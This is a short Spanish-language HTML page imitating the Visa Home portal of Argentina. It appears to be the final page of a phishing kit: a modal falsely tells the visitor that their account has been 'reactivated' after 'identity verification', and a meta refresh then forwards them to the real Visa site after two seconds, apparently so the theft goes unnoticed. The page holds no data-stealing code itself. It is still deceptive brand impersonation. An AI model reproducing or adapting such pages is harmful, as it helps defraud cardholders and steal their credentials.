<!DOCTYPE html>
<html><head>
<link href="style.css" rel="stylesheet" type="text/css">
<meta http-equiv="refresh" content="2;URL=https://inetserv.visa.com.ar/visahome/">
</head>

<body>
<!-- base semi-transparente -->
<div id="fade" class="overlay"></div>
<!-- fin base semi-transparente -->
<!-- ventana modal -->
<div style="top: 241px; left: 328px; width: 388px; height: 136px;" id="light" class="modalok">
<div>
<div id="plop">
<h2>VERIFICACI�N DE IDENTIDAD - REACTIVACION DE CUENTA</h2>
<br>
Su Cuenta ya se encuentra reactivada. Ya puede acceder al panel de VISA
HOME. Muchas Gracias y Continue disfrutando los servicios de Visa Home.
</div>
</div>
</div>
<!-- fin ventana modal -->
<div id="header-top"></div>
<div id="content">
<center><img src="vhome_clear.png"></center>
</div>
<div id="footer">
<center><img src="vhome_foot_noborder.png" height="39" width="980"></center>
</div>
</body></html>